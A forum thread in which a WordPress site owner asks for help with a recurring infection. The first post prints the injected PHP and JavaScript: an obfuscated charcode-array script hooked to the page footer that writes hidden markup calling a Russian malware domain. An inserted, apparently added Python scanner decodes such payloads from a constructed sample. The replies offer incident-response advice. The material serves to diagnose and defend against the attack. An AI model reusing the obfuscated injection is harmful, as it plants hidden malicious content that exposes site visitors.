Thread: Wordpress malware through backdoor?

  1. #1

    Wordpress malware through backdoor?

    Hello,

    Two types of malware attacks were encountered in the last 2 months on my site. The first was a modification of the .htaccess file to add a redirection to the malware site mobi-avto.ru for mobile users. I cleaned the .htaccess file about 6 times after repeated attacks; now that has stopped and I detected a new one. When we load the site there were hidden requests sent to mobi-avto.ru and a couple of other sites, possibly for obtaining impressions or traffic? The infected file was wp-includes/default-filters.php; the malware code was added before the penultimate line.

    function Kgspy_xig(){echo'<script type="text/javascript">var Petm_phw=[723,783,823,828,841,755,838,839,844,831,824,784,757,835,834,838,828,839,828,834,833,781,755,820,821,838,834,831,840,839,824,782,755,831,824,825,839,781,768,772,771,771,760,782,755,839,834,835,781,771,760,782,755,842,828,823,839,827,781,772,771,771,760,782,755,827,824,828,826,827,839,781,772,771,771,760,782,757,785,783,828,825,837,820,832,824,755,838,839,844,831,824,784,757,842,828,823,839,827,781,772,771,771,760,782,827,824,828,826,827,839,781,772,771,771,760,757,755,842,828,823,839,827,784,757,772,771,771,760,757,755,838,822,837,834,831,831,828,833,826,784,757,833,834,757,755,825,837,820,832,824,821,834,837,823,824,837,784,757,833,834,757,755,832,820,837,826,828,833,842,828,823,839,827,784,757,771,757,755,832,820,837,826,828,833,827,824,828,826,827,839,784,757,771,757,755,838,837,822,784,757,827,839,839,835,781,770,770,832,834,821,828,768,820,841,839,834,769,837,840,770,837,770,820,831,835,827,820,757,785,783,770,828,825,837,820,832,824,785,783,770,823,828,841,785];var Cgane_wbw="";for (var i=0; i<Petm_phw.length; i++) {Cgane_wbw+=String.fromCharCode(Petm_phw[i]-Petm_phw[0]);} document.write(Cgane_wbw);</script>';}
    add_action('wp_footer',Kgspy_xig);

    Please advise, how the attacker is getting access to my filesystem and how to prevent this.

    Thanks in advance
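The injected code above follows a common pattern: a function hooked to wp_footer echoes a script that rebuilds a string from a charcode array, subtracting the array's first element from each value. The scanner below is an added example (not code from the thread) that decodes that scheme from a PHP file and reports wp_footer hooks and any hostnames the hidden HTML references; the sample PHP it runs on is constructed here with a placeholder domain, not the thread's payload.

```python
import re

# Constructed sample that mimics the thread's obfuscation scheme (our own
# payload and a placeholder domain, not the real injected code).
OFFSET = 700
HIDDEN_HTML = ('<div style="position:absolute;left:-100%">'
               '<iframe src="http://malware.example/r/x"></iframe></div>')
_codes = [OFFSET] + [ord(c) + OFFSET for c in HIDDEN_HTML]
SAMPLE_PHP = (
    "function Xyz_abc(){echo'<script type=\"text/javascript\">var A_b=["
    + ",".join(str(n) for n in _codes)
    + "];var C_d=\"\";for (var i=0; i<A_b.length; i++) "
    + "{C_d+=String.fromCharCode(A_b[i]-A_b[0]);} document.write(C_d);</script>';}\n"
    + "add_action('wp_footer',Xyz_abc);\n"
)

# A JS array literal made only of integers, and a wp_footer hook registration.
ARRAY_RE = re.compile(r"var\s+\w+\s*=\s*\[([\d,\s]+)\]")
FOOTER_HOOK_RE = re.compile(r"add_action\(\s*['\"]wp_footer['\"]\s*,\s*(\w+)\s*\)")


def decode_charcode_arrays(php_source):
    """Decode every integer array using the 'subtract the first element' scheme."""
    decoded = []
    for m in ARRAY_RE.finditer(php_source):
        nums = [int(x) for x in re.findall(r"\d+", m.group(1))]
        if len(nums) < 2:
            continue
        key = nums[0]
        # Skip values that would not map to a valid code point.
        decoded.append("".join(chr(n - key) for n in nums[1:]
                               if 0 <= n - key < 0x110000))
    return decoded


def find_footer_hooks(php_source):
    """Names of callbacks registered on wp_footer (core files should have none)."""
    return FOOTER_HOOK_RE.findall(php_source)


def extract_hosts(html):
    return sorted(set(re.findall(r"https?://([\w.-]+)", html)))


def scan(php_source):
    """Summarise what a suspicious PHP snippet would inject into the page."""
    hooks = find_footer_hooks(php_source)
    payloads = decode_charcode_arrays(php_source)
    hosts = sorted({h for p in payloads for h in extract_hosts(p)})
    injects_markup = any("<iframe" in p.lower() or "<script" in p.lower() for p in payloads)
    return {"footer_hooks": hooks, "decoded": payloads, "hosts": hosts,
            "suspicious": bool(hooks) and injects_markup}


if __name__ == "__main__":
    print(scan(SAMPLE_PHP))
```

Running it on a real infected file would list the decoded markup and the hosts it loads, which is what to block at the proxy and look for in the access logs.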

  2. #2
    b0nd (Join Date: Jul 2010, Location: irc.freenode.net #g4h, Posts: 744)
    Hi,

    Sadly the attacker is already in and is playing with files at any time, making his/her intentions a reality.
    First, let us know: is your website on shared hosting or on a VPS? Thereafter a further strategy could be planned in a better way.

    Cheers!
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

  3. #3
    Yes Bond, it is on shared hosting and we also have more than 10 add-on domains. All of them were affected in the same way.

  4. #4
    b0nd
    In that case, possibly, the intrusion happened through one of them and the attacker later escalated privileges to 'root' and is free to edit any file on any domain. Anyway, let bygones be bygones...

    A clean system has to be built now. But that would be next to impossible until the weakness is found. Do you have log files to find the intrusion? Unless the attacker has wiped his/her traces, you should be able to find the intrusion in the logs (it could be a tiresome job though).
    Once that is done, patching of the vulnerability, followed by a clean system setup & hardening of the server + applications, is recommended.

    Feel free to discuss.

    Cheers

  5. #5
    Well, I have asked hosting support to investigate and identify the backdoor. It has been 2 days and they have just replied not to change anything until their clean-up is completed. They even recommended Sitelock security for preventing further attacks. The cPanel error log seems to be empty and the access logs are quite large; it seems that I need to search them for a hint.

    Meanwhile, let me also wait for what the hosting guys come up with. Regarding hardening the server, we need to discuss it with them and suggest things.

    Will update the progress.

    Thanks!

  6. #6
    It is day 3 and support is yet to update lol !!

  7. #7
    41.w4r10r (Join Date: Jul 2010, Location: Pune, Posts: 338, Blog Entries: 3)
    Quote Originally Posted by shiyashamsu
    It is day 3 and support is yet to update lol !!
    That's how shared hosting generally works.

    By the time they find out the issue, you can also start looking at the plugins you have installed on your domains and any recent vulnerabilities disclosed for them, to find possible ways of intrusion.

  8. #8
    Have you installed any pirated plugins?

  9. #9
    Okay, so first just test the plugins you installed; there is a chance the attacker exploited vulnerable plugins. The most popular way to hack WordPress is vulnerable and up to date plugins. I will analyze the JS code and submit a more detailed answer.
